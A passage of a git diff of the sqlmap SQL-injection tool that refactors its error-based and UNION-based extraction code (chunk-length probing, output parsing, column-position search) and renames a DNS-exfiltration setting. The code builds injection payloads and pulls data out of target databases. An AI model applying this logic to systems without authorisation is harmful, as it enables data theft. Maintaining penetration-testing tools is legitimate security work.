getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain) expressionUnescaped = unescaper.escape(expressionRequest) if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): @@ -107,7 +111,7 @@ def dnsUse(payload, expression): debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start)) logger.debug(debugMsg) - elif conf.dnsName: + elif conf.dnsDomain: warnMsg = "DNS data exfiltration method through SQL injection " warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms() singleTimeWarnMessage(warnMsg) diff --git a/lib/techniques/error/__init__.py b/lib/techniques/error/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/techniques/error/__init__.py +++ b/lib/techniques/error/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 813a764c2..fc928eadb 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -16,6 +16,7 @@ from lib.core.common import calculateDeltaSeconds from lib.core.common import dataToStdout from lib.core.common import decodeHexValue from lib.core.common import extractRegexResult +from lib.core.common import getConsoleWidth from lib.core.common import getPartRun from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve @@ -27,6 +28,7 @@ from lib.core.common import isNumPosStrValue from lib.core.common import listToStrValue from lib.core.common import readInput from lib.core.common import unArrayizeValue +from lib.core.common import wasLastResponseHTTPError from lib.core.convert import hexdecode from lib.core.convert import htmlunescape from lib.core.data import conf @@ -35,12 +37,15 @@ from lib.core.data import logger from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS +from lib.core.enums import HASHDB_KEYS from lib.core.enums import HTTP_HEADER +from lib.core.exception import SqlmapDataException from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD -from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH -from lib.core.settings import MSSQL_ERROR_CHUNK_LENGTH +from lib.core.settings import MIN_ERROR_CHUNK_LENGTH +from lib.core.settings import MAX_ERROR_CHUNK_LENGTH from lib.core.settings import NULL from lib.core.settings import PARTIAL_VALUE_MARKER +from lib.core.settings import ROTATING_CHARS from lib.core.settings import SLOW_ORDER_COUNT_THRESHOLD from lib.core.settings import SQL_SCALAR_REGEX from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT @@ -50,8 +55,9 @@ from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request from lib.utils.progress import ProgressBar -def _oneShotErrorUse(expression, field=None): +def _oneShotErrorUse(expression, field=None, chunkTest=False): offset = 1 + rotator = 0 partialValue = None threadData = getCurrentThreadData() retVal = hashDBRetrieve(expression, checkConf=True) @@ -63,28 +69,47 @@ def _oneShotErrorUse(expression, field=None): threadData.resumed = retVal is not None and not partialValue - if Backend.isDbms(DBMS.MYSQL): - chunk_length = MYSQL_ERROR_CHUNK_LENGTH - elif Backend.isDbms(DBMS.MSSQL): - chunk_length = MSSQL_ERROR_CHUNK_LENGTH - else: - chunk_length = None + if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and kb.errorChunkLength is None and not chunkTest and not kb.testMode: + debugMsg = "searching for error chunk length..." + logger.debug(debugMsg) + + current = MAX_ERROR_CHUNK_LENGTH + while current >= MIN_ERROR_CHUNK_LENGTH: + testChar = str(current % 10) + testQuery = "SELECT %s('%s',%d)" % ("REPEAT" if Backend.isDbms(DBMS.MYSQL) else "REPLICATE", testChar, current) + result = unArrayizeValue(_oneShotErrorUse(testQuery, chunkTest=True)) + + if (result or "").startswith(testChar): + if result == testChar * current: + kb.errorChunkLength = current + break + else: + result = re.search(r"\A\w+", result).group(0) + candidate = len(result) - len(kb.chars.stop) + current = candidate if candidate != current else current - 1 + else: + current = current / 2 + + if kb.errorChunkLength: + hashDBWrite(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH, kb.errorChunkLength) + else: + kb.errorChunkLength = 0 if retVal is None or partialValue: try: while True: - check = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) - trimcheck = "%s(?P<result>[^<]*)" % (kb.chars.start) + check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) + trimcheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start if field: nulledCastedField = agent.nullAndCastField(field) - if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and not any(_ in field for _ in ("COUNT", "CASE")): # skip chunking of scalar expression (unneeded) + if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and not any(_ in field for _ in ("COUNT", "CASE")) and kb.errorChunkLength and not chunkTest: extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(field), expression).group(0) if extendedField != field: # e.g. MIN(surname) nulledCastedField = extendedField.replace(field, nulledCastedField) field = extendedField - nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) + nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, kb.errorChunkLength) # Forge the error-based SQL injection request vector = kb.injection.data[kb.technique].vector @@ -96,7 +121,7 @@ def _oneShotErrorUse(expression, field=None): payload = agent.payload(newValue=injExpression) # Perform the request - page, headers = Request.queryPage(payload, content=True, raise404=False) + page, headers, _ = Request.queryPage(payload, content=True, raise404=False) incrementCounter(kb.technique) @@ -106,32 +131,29 @@ def _oneShotErrorUse(expression, field=None): # Parse the returned page to get the exact error-based # SQL injection output output = reduce(lambda x, y: x if x is not None else y, (\ - extractRegexResult(check, page, re.DOTALL | re.IGNORECASE), \ - extractRegexResult(check, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \ - if headers else None), re.DOTALL | re.IGNORECASE), \ - extractRegexResult(check, threadData.lastRedirectMsg[1] \ - if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ - threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)), \ + extractRegexResult(check, page), \ + extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), \ + extractRegexResult(check, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] if headers else None)), \ + extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)), \ None) if output is not None: output = getUnicode(output) else: - trimmed = extractRegexResult(trimcheck, page, re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(trimcheck, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \ - if headers else None), re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] \ - if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ - threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) + trimmed = extractRegexResult(trimcheck, page) \ + or extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) \ + or extractRegexResult(trimcheck, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] if headers else None)) \ + or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) if trimmed: - warnMsg = "possible server trimmed output detected " - warnMsg += "(due to its length and/or content): " - warnMsg += safecharencode(trimmed) - logger.warn(warnMsg) + if not chunkTest: + warnMsg = "possible server trimmed output detected " + warnMsg += "(due to its length and/or content): " + warnMsg += safecharencode(trimmed) + logger.warn(warnMsg) if not kb.testMode: - check = "(?P<result>.*?)%s" % kb.chars.stop[:2] + check = r"(?P<result>[^<>\n]*?)%s" % kb.chars.stop[:2] output = extractRegexResult(check, trimmed, re.IGNORECASE) if not output: @@ -146,13 +168,21 @@ def _oneShotErrorUse(expression, field=None): else: retVal += output if output else '' - if output and len(output) >= chunk_length: - offset += chunk_length + if output and kb.errorChunkLength and len(output) >= kb.errorChunkLength and not chunkTest: + offset += kb.errorChunkLength else: break - if kb.fileReadMode and output: - dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t")) + if output and conf.verbose in (1, 2) and not conf.api: + if kb.fileReadMode: + dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t")) + elif offset > 1: + rotator += 1 + + if rotator >= len(ROTATING_CHARS): + rotator = 0 + + dataToStdout("\r%s\r" % ROTATING_CHARS[rotator]) else: retVal = output break @@ -172,8 +202,8 @@ def _oneShotErrorUse(expression, field=None): hashDBWrite(expression, retVal) else: - _ = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) - retVal = extractRegexResult(_, retVal, re.DOTALL | re.IGNORECASE) or retVal + _ = "(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) + retVal = extractRegexResult(_, retVal) or retVal return safecharencode(retVal) if kb.safeCharEncode else retVal @@ -181,6 +211,7 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e values = [] origExpr = None + width = getConsoleWidth() threadData = getCurrentThreadData() for field in expressionFieldsList: @@ -207,7 +238,12 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e if kb.fileReadMode and output and output.strip(): print elif output is not None and not (threadData.resumed and kb.suppressResumeInfo) and not (emptyFields and field in emptyFields): - dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(output))) + status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", output if kb.safeCharEncode else safecharencode(output)) + + if len(status) > width: + status = "%s..." % status[:width - 3] + + dataToStdout("%s\n" % status) if isinstance(num, int): expression = origExpr @@ -262,7 +298,7 @@ def errorUse(expression, dump=False): _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) # Set kb.partRun in case the engine is called from the API - kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None + kb.partRun = getPartRun(alias=False) if conf.api else None # We have to check if the SQL query might return multiple entries # and in such case forge the SQL limiting the query output one @@ -316,87 +352,94 @@ def errorUse(expression, dump=False): value = [] # for empty tables return value - if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD: - message = "due to huge table size do you want to remove " - message += "ORDER BY clause gaining speed over consistency? [y/N] " - _ = readInput(message, default="N") + if isNumPosStrValue(count) and int(count) > 1: + if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD: + message = "due to huge table size do you want to remove " + message += "ORDER BY clause gaining speed over consistency? [y/N] " - if _ and _[0] in ("y", "Y"): - expression = expression[:expression.index(" ORDER BY ")] + if readInput(message, default="N", boolean=True): + expression = expression[:expression.index(" ORDER BY ")] - numThreads = min(conf.threads, (stopLimit - startLimit)) + numThreads = min(conf.threads, (stopLimit - startLimit)) - threadData = getCurrentThreadData() - threadData.shared.limits = iter(xrange(startLimit, stopLimit)) - threadData.shared.value = BigArray() - threadData.shared.buffered = [] - threadData.shared.counter = 0 - threadData.shared.lastFlushed = startLimit - 1 - threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 + threadData = getCurrentThreadData() - if threadData.shared.showEta: - threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) + try: + threadData.shared.limits = iter(xrange(startLimit, stopLimit)) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) - if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD): - for field in expressionFieldsList: - if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0': - emptyFields.append(field) - debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable) - debugMsg += "dumped as it appears to be empty" - logger.debug(debugMsg) + threadData.shared.value = BigArray() + threadData.shared.buffered = [] + threadData.shared.counter = 0 + threadData.shared.lastFlushed = startLimit - 1 + threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 - if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: - kb.suppressResumeInfo = True - debugMsg = "suppressing possible resume console info because of " - debugMsg += "large number of rows. It might take too long" - logger.debug(debugMsg) + if threadData.shared.showEta: + threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) - try: - def errorThread(): - threadData = getCurrentThreadData() + if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD): + for field in expressionFieldsList: + if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0': + emptyFields.append(field) + debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable) + debugMsg += "dumped as it appears to be empty" + logger.debug(debugMsg) - while kb.threadContinue: - with kb.locks.limit: - try: - valueStart = time.time() - threadData.shared.counter += 1 - num = threadData.shared.limits.next() - except StopIteration: + if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: + kb.suppressResumeInfo = True + debugMsg = "suppressing possible resume console info because of " + debugMsg += "large number of rows. It might take too long" + logger.debug(debugMsg) + + try: + def errorThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + with kb.locks.limit: + try: + valueStart = time.time() + threadData.shared.counter += 1 + num = threadData.shared.limits.next() + except StopIteration: + break + + output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta) + + if not kb.threadContinue: break - output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta) + if output and isListLike(output) and len(output) == 1: + output = output[0] - if not kb.threadContinue: - break + with kb.locks.value: + index = None + if threadData.shared.showEta: + threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) + for index in xrange(1 + len(threadData.shared.buffered)): + if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: + break + threadData.shared.buffered.insert(index or 0, (num, output)) + while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: + threadData.shared.lastFlushed += 1 + threadData.shared.value.append(threadData.shared.buffered[0][1]) + del threadData.shared.buffered[0] - if output and isListLike(output) and len(output) == 1: - output = output[0] + runThreads(numThreads, errorThread) - with kb.locks.value: - index = None - if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, (num, output)) - while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: - threadData.shared.lastFlushed += 1 - threadData.shared.value.append(threadData.shared.buffered[0][1]) - del threadData.shared.buffered[0] + except KeyboardInterrupt: + abortedFlag = True + warnMsg = "user aborted during enumeration. sqlmap " + warnMsg += "will display partial output" + logger.warn(warnMsg) - runThreads(numThreads, errorThread) - - except KeyboardInterrupt: - abortedFlag = True - warnMsg = "user aborted during enumeration. sqlmap " - warnMsg += "will display partial output" - logger.warn(warnMsg) - - finally: - threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered)) - value = threadData.shared.value - kb.suppressResumeInfo = False + finally: + threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered)) + value = threadData.shared.value + kb.suppressResumeInfo = False if not value and not abortedFlag: value = _errorFields(expression, expressionFields, expressionFieldsList) diff --git a/lib/techniques/union/__init__.py b/lib/techniques/union/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/techniques/union/__init__.py +++ b/lib/techniques/union/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index a498bf08c..ac0472155 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import logging import random import re @@ -52,11 +53,11 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where= query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix) query = agent.suffixQuery(query, suffix=suffix, comment=comment) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - return not re.search(r"(warning|error|order by|failed)", page or "", re.I) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I) + page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) + return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) if _orderByTest(1) and not _orderByTest(randomInt()): - infoMsg = "ORDER BY technique seems to be usable. " + infoMsg = "'ORDER BY' technique appears to be usable. " infoMsg += "This should reduce the time needed " infoMsg += "to find the right number " infoMsg += "of query columns. Automatically extending the " @@ -104,24 +105,26 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where= for count in xrange(lowerCount, upperCount + 1): query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) + page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) if not isNullValue(kb.uChar): pages[count] = page - ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO + ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO ratios.append(ratio) min_, max_ = min(min_, ratio), max(max_, ratio) items.append((count, ratio)) if not isNullValue(kb.uChar): for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar): - contains = [(count, re.search(regex, page or "", re.IGNORECASE) is not None) for count, page in pages.items()] - if len(filter(lambda x: x[1], contains)) == 1: - retVal = filter(lambda x: x[1], contains)[0][0] + contains = [(count, re.search(regex, _ or "", re.IGNORECASE) is not None) for count, _ in pages.items()] + if len(filter(lambda _: _[1], contains)) == 1: + retVal = filter(lambda _: _[1], contains)[0][0] break if not retVal: - ratios.pop(ratios.index(min_)) - ratios.pop(ratios.index(max_)) + if min_ in ratios: + ratios.pop(ratios.index(min_)) + if max_ in ratios: + ratios.pop(ratios.index(max_)) minItem, maxItem = None, None @@ -131,10 +134,10 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where= elif item[1] == max_: maxItem = item - if all(map(lambda x: x == min_ and x != max_, ratios)): + if all(_ == min_ and _ != max_ for _ in ratios): retVal = maxItem[0] - elif all(map(lambda x: x != min_ and x == max_, ratios)): + elif all(_ != min_ and _ == max_ for _ in ratios): retVal = minItem[0] elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE: @@ -152,7 +155,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where= if retVal: infoMsg = "target URL appears to be UNION injectable with %d columns" % retVal - singleTimeLogMessage(infoMsg) + singleTimeLogMessage(infoMsg, logging.INFO, re.sub(r"\d+", "N", infoMsg)) return retVal @@ -165,74 +168,78 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO # Unbiased approach for searching appropriate usable column random.shuffle(positions) - # For each column of the table (# of NULL) perform a request using - # the UNION ALL SELECT statement to test it the target URL is - # affected by an exploitable union SQL injection vulnerability - for position in positions: - # Prepare expression with delimiters - randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) - phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop) - randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) - randQueryUnescaped = unescaper.escape(randQueryProcessed) + for charCount in (UNION_MIN_RESPONSE_CHARS << 2, UNION_MIN_RESPONSE_CHARS): + if vector: + break - # Forge the union SQL injection request - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + # For each column of the table (# of NULL) perform a request using + # the UNION ALL SELECT statement to test it the target URL is + # affected by an exploitable union SQL injection vulnerability + for position in positions: + # Prepare expression with delimiters + randQuery = randomStr(charCount) + phrase = "%s%s%s".lower() % (kb.chars.start, randQuery, kb.chars.stop) + randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) + randQueryUnescaped = unescaper.escape(randQueryProcessed) - # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") + # Forge the union SQL injection request + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) - if content and phrase in content: - validPayload = payload - kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1 - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False) + # Perform the request + page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False) + content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ + removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ + payload, True) or "") - if where == PAYLOAD.WHERE.ORIGINAL: - # Prepare expression with delimiters - randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS) - phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop) - randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) - randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) + if content and phrase in content: + validPayload = payload + kb.unionDuplicates = len(re.findall(phrase, content, re.I)) > 1 + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, False) - # Confirm that it is a full union SQL injection - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) - payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + if where == PAYLOAD.WHERE.ORIGINAL: + # Prepare expression with delimiters + randQuery2 = randomStr(charCount) + phrase2 = "%s%s%s".lower() % (kb.chars.start, randQuery2, kb.chars.stop) + randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) + randQueryUnescaped2 = unescaper.escape(randQueryProcessed2) - # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") - - if not all(_ in content for _ in (phrase, phrase2)): - vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) - elif not kb.unionDuplicates: - fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) - - # Check for limited row output - query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) + # Confirm that it is a full union SQL injection + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) # Perform the request - page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) - content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ - removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ - payload, True) or "") - if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: - warnMsg = "output with limited number of rows detected. Switching to partial mode" - logger.warn(warnMsg) - vector = (position, count, comment, prefix, suffix, kb.uChar, PAYLOAD.WHERE.NEGATIVE, kb.unionDuplicates, False) + page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False) + content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "") - unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError() + if not all(_ in content for _ in (phrase, phrase2)): + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) + elif not kb.unionDuplicates: + fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) - if unionErrorCase and count > 1: - warnMsg = "combined UNION/error-based SQL injection case found on " - warnMsg += "column %d. sqlmap will try to find another " % (position + 1) - warnMsg += "column with better characteristics" - logger.warn(warnMsg) - else: - break + # Check for limited row output + query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) + payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) + + # Perform the request + page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False) + content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \ + removeReflectiveValues(listToStrValue(headers.headers if headers else None), \ + payload, True) or "") + if content.count(phrase) > 0 and content.count(phrase) < LIMITED_ROWS_TEST_NUMBER: + warnMsg = "output with limited number of rows detected. Switching to partial mode" + logger.warn(warnMsg) + vector = (position, count, comment, prefix, suffix, kb.uChar, where, kb.unionDuplicates, True) + + unionErrorCase = kb.errorIsNone and wasLastResponseDBMSError() + + if unionErrorCase and count > 1: + warnMsg = "combined UNION/error-based SQL injection case found on " + warnMsg += "column %d. sqlmap will try to find another " % (position + 1) + warnMsg += "column with better characteristics" + logger.warn(warnMsg) + else: + break return validPayload, vector @@ -276,8 +283,8 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) if not conf.uChar and count > 1 and kb.uChar == NULL: message = "injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] " - test = readInput(message, default="Y") - if test[0] not in ("y", "Y"): + + if not readInput(message, default="Y", boolean=True): warnMsg += "usage of option '--union-char' " warnMsg += "(e.g. '--union-char=1') " else: diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 034223c52..11a32a96f 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -1,12 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import binascii import re import time +import xml.etree.ElementTree from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent @@ -43,10 +45,13 @@ from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapSyntaxException from lib.core.settings import MAX_BUFFERED_PARTIAL_UNION_LENGTH +from lib.core.settings import NULL from lib.core.settings import SQL_SCALAR_REGEX from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT +from lib.core.settings import UNICODE_ENCODING from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.core.unescaper import unescaper @@ -55,54 +60,93 @@ from lib.utils.progress import ProgressBar from thirdparty.odict.odict import OrderedDict def _oneShotUnionUse(expression, unpack=True, limited=False): - retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as union data is stored raw unconverted + retVal = hashDBRetrieve("%s%s" % (conf.hexConvert or False, expression), checkConf=True) # as UNION data is stored raw unconverted threadData = getCurrentThreadData() threadData.resumed = retVal is not None if retVal is None: - # Prepare expression with delimiters - injExpression = unescaper.escape(agent.concatQuery(expression, unpack)) - - # Forge the union SQL injection request vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector - kb.unionDuplicates = vector[7] - kb.forcePartialUnion = vector[8] - query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) - where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6] + + if not kb.rowXmlMode: + injExpression = unescaper.escape(agent.concatQuery(expression, unpack)) + kb.unionDuplicates = vector[7] + kb.forcePartialUnion = vector[8] + query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) + where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6] + else: + where = vector[6] + query = agent.forgeUnionQuery(expression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False) + payload = agent.payload(newValue=query, where=where) # Perform the request - page, headers = Request.queryPage(payload, content=True, raise404=False) + page, headers, _ = Request.queryPage(payload, content=True, raise404=False) incrementCounter(PAYLOAD.TECHNIQUE.UNION) - # Parse the returned page to get the exact union-based - # SQL injection output - def _(regex): - return reduce(lambda x, y: x if x is not None else y, (\ - extractRegexResult(regex, 